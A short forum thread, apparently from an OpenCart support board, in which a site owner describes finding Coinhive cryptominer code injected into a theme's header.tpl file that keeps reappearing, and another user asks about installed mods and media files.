Page 1 of 1

Brocoiner!rfn trojan

Posted: Thu Oct 11, 2018 6:53 pm
by _imagine_
Hello guys,
I have been working on a new website the last few days and everything was going great, until yesterday. Suddenly when I was viewing the front end of the website I got a message that it is trying to connect something identified as "Trojan:HTML/Brocoiner!rfn" apparently this is a program that attaches itself to the website and proceeds to use its users pcs to mine some sort of concurrency. There is a lot of info out there for how to remove it from pc but none on where it might be hiding on a server. Weird thing is I haven't uploaded any new modules or themes on the ftp only a few media files. However neither my friends nor I got that antivirus message before yesterday. Sucuri SiteCheck doesn't seem to find anything wrong.

Re: Brocoiner!rfn trojan

Posted: Fri Oct 12, 2018 2:59 am
by IP_CAM
Weird thing is I haven't uploaded any new modules or themes
Are you talking about a problem, related to some unknown yet OpenCart Version,
or is this about your regular Website, and some Media-Files, you added ?
And did you check those Media Files first, to make sure, they're clean ?! ???
Ernie

Re: Brocoiner!rfn trojan

Posted: Sat Oct 13, 2018 12:03 am
by _imagine_
Hello,
This is a regular 2.3.0.2, I didn't check all the media files but they were just pictures. Using notepad++ I found unwanted code linked to coinhive in header.tpl both in the default and my theme, I removed the code and people stopped getting a message and the site stopped abusing my processor as soon as I open it.
However there must still be something left because as soon as I change anything on the site through admin panel or through ftp the unwanted code is back in header.tpl, anyways this is how far I've gotten I'll post here if I find a complete fix to the problem.

Re: Brocoiner!rfn trojan

Posted: Sat Oct 13, 2018 1:32 am
by IP_CAM
Well, it might be a regular v.2.3.0.2, but you possibly added some Mods,
or then, you use other Code like Wordpress e.t.c., on the same Server.
But without real Data, it's just filling useless topics...
Ernie